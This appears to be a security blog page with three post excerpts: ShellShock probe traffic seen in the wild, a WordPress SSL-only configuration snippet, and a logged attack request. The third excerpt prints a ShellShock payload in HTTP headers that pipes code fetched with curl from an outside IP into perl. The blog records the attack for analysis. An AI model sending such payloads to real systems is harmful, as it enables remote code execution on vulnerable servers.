The Cookie Madness

Posted in Attack of the Day

There are a fair number of ShellShock type attacks that come through here every day.  Below is a short example of one.  I have no idea what a tilimilitriam might be, but I would hazard a guess and say it doesn’t appear on any page that I’ve crafted (with one exception.. dang). Being such a unique word makes it a great choice for a return value to a script – keeps the false positives down.  I’m working under the assumption that a script is generating all these requests and is waiting to see tilimilitriam show up in the response, at […]

Moving WordPress to SSL Only

Posted in Security Stuffs

I moved my WordPress site to SSL only today.  Very straightforward process as it turns out.  The WordPress Codex pointed me towards the changes required in the application itself.  In your wp-config.php just throw in the following lines:

    define('FORCE_SSL_ADMIN', true);
    // Only read the header if the proxy actually sent it (avoids an undefined-index notice)
    if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')
        $_SERVER['HTTPS'] = 'on';

This small piece of configuration tells the system to force all administrative things over SSL.  It also tells the system to look for an X_FORWARDED_PROTO header.  If that value contains https, then use SSL. Since I have a BIG-IP in front of my WordPress instance, we’ll […]

My New Toy

Posted in Attack of the Day

** Standard Warnings Apply ** Let me help you understand.

Interesting attack for today…  The attack vector on this one is pretty much like the 100’s of others I’ve seen today.  Hoping for a vulnerable bash version, it would seem.  Assuming they found an open system, they wanted to make sure I received a copy of something.

    GET /cgi-bin-sdb/printenv HTTP/1.0
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Cookie: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
    Referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
    User-Agent: () { :; }; curl […]